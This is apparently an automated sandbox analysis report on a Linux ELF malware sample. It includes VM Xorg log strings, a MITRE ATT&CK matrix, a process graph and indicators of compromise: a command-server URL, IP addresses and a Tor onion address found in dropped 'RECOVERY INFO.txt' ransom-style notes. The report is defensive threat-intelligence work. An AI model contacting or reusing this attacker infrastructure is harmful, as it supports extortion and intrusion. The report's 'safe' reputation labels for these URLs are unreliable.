Source: Xorg.0.log.47.drBinary or memory string: [ 436.607] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.658] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.349] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.464] (II) vmware(0): Not using default mode "1440x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.683] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.265] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.505] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.755] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.132] (==) vmware(0): RGB weight 888
Source: Xorg.0.log.47.drBinary or memory string: [ 436.670] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.876] (II) vmware(0): Modeline "800x600"x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.622] (**) VirtualPS/2 VMware VMMouse: always reports core events
Source: Xorg.0.log.47.drBinary or memory string: [ 435.082] (--) vmware(0): vram: 4194304
Source: Xorg.0.log.47.drBinary or memory string: [ 436.766] (II) vmware(0): Virtual size is 800x600 (pitch 1176)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.584] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.573] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.573] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.431] (II) vmware(0): Not using default mode "680x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.673] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.581] (II) vmware(0): Not using default mode "1368x768" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.407] (II) Module vmware: vendor="X.Org Foundation"
Source: Xorg.0.log.47.drBinary or memory string: [ 436.774] (**) vmware(0): Default mode "1152x864": 143.5 MHz, 91.5 kHz, 100.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 435.230] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.074] (--) vmware(0): depth: 24
Source: Xorg.0.log.47.drBinary or memory string: [ 436.791] (**) vmware(0): Default mode "1152x864": 108.0 MHz, 67.5 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.643] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.667] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.533] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.826] (**) vmware(0): Default mode "1024x768": 75.0 MHz, 56.5 kHz, 70.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.467] (II) vmware(0): Not using default mode "720x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.310] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.686] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.515] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.341] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.554] (II) vmware(0): Not using default mode "960x540" (monitor doesn't support reduced blanking)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.599] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.700] (II) XINPUT: Adding extended input device "VirtualPS/2 VMware VMMouse" (type: MOUSE, id 9)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.343] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.562] (II) vmware(0): Not using default mode "1024x576" (monitor doesn't support reduced blanking)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.699] (II) vmware(0): Not using default mode "15360x8640" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.758] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.941] (II) vmware(0): Modeline "640x360"x59.3 17.75 640 688 720 800 360 363 368 374 +hsync -vsync (22.2 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.477] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.780] (**) vmware(0): Default mode "1152x864": 121.5 MHz, 77.5 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.418] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.124] (==) vmware(0): Depth 24, (==) framebuffer bpp 32
Source: Xorg.0.log.47.drBinary or memory string: [ 436.696] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.576] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.163] (II) vmware(0): Initialized VMware Xv extension successfully.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.662] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 434.858] (WW) vmware(0): Disabling Render Acceleration.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.938] (**) vmware(0): Default mode "640x360": 17.8 MHz, 22.2 kHz, 59.3 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.459] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.871] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.813] (II) vmware(0): Modeline "1152x864"x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.868] (**) vmware(0): Default mode "800x600": 50.0 MHz, 48.1 kHz, 72.2 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.512] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.539] (II) vmware(0): Not using default mode "360x202" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.297] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.500] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.691] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.376] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.586] (II) vmware(0): Not using default mode "1368x768" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.436] (II) vmware(0): Not using default mode "680x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.602] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.594] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.808] (II) vmware(0): Modeline "1152x864"x70.0 96.77 1152 1224 1344 1536 864 865 868 900 -hsync +vsync (63.0 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.570] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.462] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.520] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.249] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.840] (II) vmware(0): Modeline "1024x576"x59.9 46.50 1024 1064 1160 1296 576 579 584 599 -hsync +vsync (35.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.408] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.921] (**) vmware(0): Default mode "720x400": 35.5 MHz, 37.9 kHz, 85.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.628] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.811] (**) vmware(0): Default mode "1152x864": 81.6 MHz, 53.7 kHz, 60.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.371] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.212] (II) vmware(0): Not using default mode "360x200" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.888] (II) vmware(0): Modeline "864x486"x59.9 32.50 864 888 968 1072 486 489 494 506 -hsync +vsync (30.3 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.482] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.454] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.331] (II) vmware(0): Not using default mode "640x480" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.665] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 436.510] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.426] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.829] (II) vmware(0): Modeline "1024x768"x70.1 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync (56.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.364] (II) LoadModule: "vmware"
Source: Xorg.0.log.47.drBinary or memory string: [ 436.707] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.918] (II) vmware(0): Modeline "720x405"x59.5 22.50 720 744 808 896 405 408 413 422 -hsync +vsync (25.1 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.623] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.736] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.772] (II) vmware(0): Modeline "vmwlegacy-default-800x600"x60.0 36.25 800 801 802 1002 600 601 602 603 (36.2 kHz ez)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.194] (II) vmware(0): Clock range: 0.00 to 400000.00 MHz
Source: Xorg.0.log.47.drBinary or memory string: [ 435.315] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.835] (II) vmware(0): Modeline "1024x768"x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.612] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.487] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.638] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.798] (**) vmware(0): Default mode "1152x864": 105.0 MHz, 67.6 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 435.216] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.428] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.688] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.879] (**) vmware(0): Default mode "800x600": 36.0 MHz, 35.2 kHz, 56.2 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 442.590] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse1)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.704] (II) vmware(0): Not using default mode "15360x8640" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.646] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.423] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.659] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.845] (II) vmware(0): Modeline "832x624"x74.6 57.28 832 864 928 1152 624 625 628 667 -hsync -vsync (49.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 434.853] (EE) vmware(0): Failed to open drm.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.636] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.617] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.117] (--) vmware(0): w.blu: 8
Source: Xorg.0.log.47.drBinary or memory string: [ 442.404] (**) VirtualPS/2 VMware VMMouse: always reports core events
Source: Xorg.0.log.47.drBinary or memory string: [ 436.420] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.641] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.109] (--) vmware(0): w.red: 8
Source: Xorg.0.log.47.drBinary or memory string: [ 435.242] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.495] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.664] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.932] (**) vmware(0): Default mode "640x360": 18.0 MHz, 22.5 kHz, 59.8 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.536] (II) vmware(0): Not using default mode "720x405" (monitor doesn't support reduced blanking)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.753] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.076] (II) vmware(0): Initialized VMWARE_CTRL extension version 0.2
Source: Xorg.0.log.47.drBinary or memory string: [ 436.900] (II) vmware(0): Modeline "640x480"x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync (37.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.783] (II) vmware(0): Modeline "1152x864"x85.1 121.50 1152 1216 1344 1568 864 865 868 911 +hsync -vsync (77.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.715] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.384] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.120] (--) vmware(0): vis: 4
Source: Xorg.0.log.47.drBinary or memory string: [ 436.952] (==) vmware(0): DPI set to (96, 96)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.906] (II) vmware(0): Modeline "640x480"x72.8 31.50 640 664 704 832 480 489 492 520 -hsync -vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.654] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.509] (II) XINPUT: Adding extended input device "VirtualPS/2 VMware VMMouse" (type: MOUSE, id 8)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.525] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.434] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.615] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.333] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.763] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.742] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.drBinary or memory string: [ 432.590] (II) vmware(0): Creating default Display subsection in Screen section
Source: Xorg.0.log.47.drBinary or memory string: [ 434.856] (WW) vmware(0): Disabling 3D support.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.544] (II) vmware(0): Not using default mode "864x486" (monitor doesn't support reduced blanking)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.113] (--) vmware(0): w.grn: 8
Source: Xorg.0.log.47.drBinary or memory string: [ 435.145] (==) vmware(0): Using HW cursor
Source: Xorg.0.log.47.drBinary or memory string: [ 436.518] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.490] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.785] (**) vmware(0): Default mode "1152x864": 119.7 MHz, 77.1 kHz, 85.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.657] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.885] (**) vmware(0): Default mode "864x486": 32.5 MHz, 30.3 kHz, 59.9 Hz

Language, Device and Operating System Detection

barindex
Reads system files that contain records of logged in users
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321)Logged in records file read: /var/log/wtmpJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		Path Interception1
Hide Artifacts		1
OS Credential Dumping		11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification		LSASS Memory1
System Owner/User Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Hidden Files and Directories		Security Account Manager1
System Network Configuration Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Indicator Removal		NTDS11
File and Directory Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets3
System Information Discovery		SSHKeylogging1
Proxy		Scheduled TransferData Encrypted for Impact

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548498 Sample: Zc9eO57fgF.elf Startdate: 04/11/2024 Architecture: LINUX Score: 52 44 109.202.202.202, 80 INIT7CH Switzerland 2->44 46 api.ipify.org 172.67.74.152, 44684, 80 CLOUDFLARENETUS United States 2->46 48 3 other IPs or domains 2->48 50 Found Tor onion address 2->50 10 gdm3 gdm-session-worker 2->10         started        12 systemd accounts-daemon 2->12         started        15 Zc9eO57fgF.elf 2->15         started        17 9 other processes 2->17 signatures3 process4 signatures5 19 gdm-session-worker gdm-x-session 10->19         started        54 Reads system files that contain records of logged in users 12->54 21 accounts-daemon language-validate 12->21         started        56 Sample reads /proc/mounts (often used for finding a writable filesystem) 15->56 process6 process7 23 gdm-x-session dbus-daemon 19->23         started        26 gdm-x-session Xorg Xorg.wrap Xorg 19->26         started        28 language-validate language-options 21->28         started        signatures8 52 Sample reads /proc/mounts (often used for finding a writable filesystem) 23->52 30 dbus-daemon 23->30         started        32 Xorg sh 26->32         started        34 language-options sh 28->34         started        process9 process10 36 dbus-daemon false 30->36         started        38 sh xkbcomp 32->38         started        40 sh locale 34->40         started        42 sh grep 34->42         started       

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Zc9eO57fgF.elf0%ReversingLabs

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://193.143.1.139/Ujdu8jjooue/biweax.php0%Avira URL Cloudsafe
https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEE0%Avira URL Cloudsafe
http://193.143.1.139/Ujdu8jjoouehttp://api.ipify0%Avira URL Cloudsafe
http://193.143.1.139/Ujdu8jjooue/biweax.phpYour0%Avira URL Cloudsafe
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://api.ipify.org/false
      		high
      http://193.143.1.139/Ujdu8jjooue/biweax.phpfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.139/Ujdu8jjoouehttp://api.ipifyZc9eO57fgF.elffalse
      • Avira URL Cloud: safe
      		unknown
      https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_isZc9eO57fgF.elffalse
        		high
        http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOZc9eO57fgF.elf, RECOVERY INFO.txt4.12.dr, RECOVERY INFO.txt13.12.dr, RECOVERY INFO.txt7.12.dr, RECOVERY INFO.txt2.12.dr, RECOVERY INFO.txt8.12.dr, RECOVERY INFO.txt.12.dr, RECOVERY INFO.txt10.12.dr, RECOVERY INFO.txt11.12.dr, RECOVERY INFO.txt0.12.dr, RECOVERY INFO.txt5.12.dr, RECOVERY INFO.txt1.12.dr, RECOVERY INFO.txt3.12.dr, RECOVERY INFO.txt9.12.dr, RECOVERY INFO.txt6.12.dr, RECOVERY INFO.txt12.12.drtrue
        • Avira URL Cloud: safe
        		unknown
        http://wiki.x.orgXorg.0.log.47.drfalse
          		high
          https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEEZc9eO57fgF.elffalse
          • Avira URL Cloud: safe
          		unknown
          http://193.143.1.139/Ujdu8jjooue/biweax.phpYourZc9eO57fgF.elffalse
          • Avira URL Cloud: safe
          		unknown
          http://www.ubuntu.com/support)Xorg.0.log.47.drfalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            193.143.1.139
            		unknownunknown
            		57271BITWEB-ASRUfalse
            109.202.202.202
            		unknownSwitzerland
            		13030INIT7CHfalse
            91.189.91.43
            		unknownUnited Kingdom
            		41231CANONICAL-ASGBfalse
            172.67.74.152
            		api.ipify.orgUnited States
            		13335CLOUDFLARENETUSfalse
            91.189.91.42
            		unknownUnited Kingdom
            		41231CANONICAL-ASGBfalse

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
            91.189.91.43main_m68k.elfGet hashmaliciousMiraiBrowse
              main_sh4.elfGet hashmaliciousMiraiBrowse
                tftp.elfGet hashmaliciousUnknownBrowse
                  Mozi.mGet hashmaliciousUnknownBrowse
                    main_arm6.elfGet hashmaliciousMiraiBrowse
                      main_mips.elfGet hashmaliciousMiraiBrowse
                        main_arm.elfGet hashmaliciousMiraiBrowse
                          i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                            x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                              armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                172.67.74.15267065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                • api.ipify.org/
                                y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                • api.ipify.org/
                                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                api.ipify.orgPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                • 172.67.74.152
                                7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                • 104.26.12.205
                                Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                • 104.26.12.205
                                Ordine d'acquisto OI16014 e OI1601.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                • 104.26.12.205

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CANONICAL-ASGBmain_m68k.elfGet hashmaliciousMiraiBrowse
                                • 91.189.91.42
                                main_sh4.elfGet hashmaliciousMiraiBrowse
                                • 91.189.91.42
                                tftp.elfGet hashmaliciousUnknownBrowse
                                • 91.189.91.42
                                Mozi.mGet hashmaliciousUnknownBrowse
                                • 91.189.91.42
                                main_arm6.elfGet hashmaliciousMiraiBrowse
                                • 91.189.91.42
